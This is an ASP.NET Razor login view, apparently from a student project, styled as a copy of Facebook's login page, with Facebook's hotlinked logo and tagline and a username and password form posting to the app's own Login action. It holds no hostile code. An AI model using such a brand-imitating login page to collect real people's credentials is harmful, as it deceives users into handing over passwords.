@model BTL_NET2.Models.User

@{
  Layout = "_LoginLayout";
}

<form asp-action="Login">
  <div class="row">
        <div class="colm-logo">
          <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Logo">
          <h2>Facebook helps you connect and share with the people in your life.</h2>
        </div>
        <div class="colm-form">
          <div class="form-container">
            <input type="text" asp-for="Name" placeholder="Username">
            <input type="password" asp-for="Password" placeholder="Password">
            <button class="btn-login" type="submit">Login</button>
            <a href="#">Forgotten password?</a>
            <button class="btn-new">Create new Account</button>
          </div>
          <p><a href="#"><b>Create a Page</b></a> for a celebrity, brand or business.</p>
        </div>
      </div>
</form>
